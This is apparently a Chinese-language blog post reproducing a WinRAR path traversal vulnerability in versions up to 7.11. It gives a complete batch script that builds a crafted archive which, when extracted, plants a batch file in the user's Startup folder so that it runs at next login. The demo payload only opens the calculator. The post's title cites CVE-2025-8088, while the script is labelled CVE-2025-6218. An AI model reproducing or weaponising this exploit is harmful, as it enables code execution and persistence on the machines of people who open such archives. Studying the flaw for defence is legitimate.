CVE-2025-8088 WinRAR 路径穿越漏洞复现

WinRAR 版本 <= 7.11

@echo off
title CVE-2025-6218 POC

echo calc.exe > POC.bat

"C:\Program Files\WinRAR\WinRAR.exe" a -ap" \.. \.. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"  CVE-2025-6218.zip POC.bat

echo.
if errorlevel 1 (
    echo [!] Failed to create POC.
) else (
    echo [+] CVE-2025-6218.zip created successfully!
)
echo.

del POC.bat

pause

上面代码保存为.bat 后双击执行生成zip文件,然后用WinRAR解压(注意压缩文件需要放到桌面或者../../这样往回跳两级能到用户目录下的路径),POC.bat会被解压到启动目录。
image
重启后看效果,计算器应用会自动打开。

参考https://cloud.tencent.com/developer/article/2549784

posted @ 2026-02-02 22:58  allastyle  阅读(16)  评论(0)    收藏  举报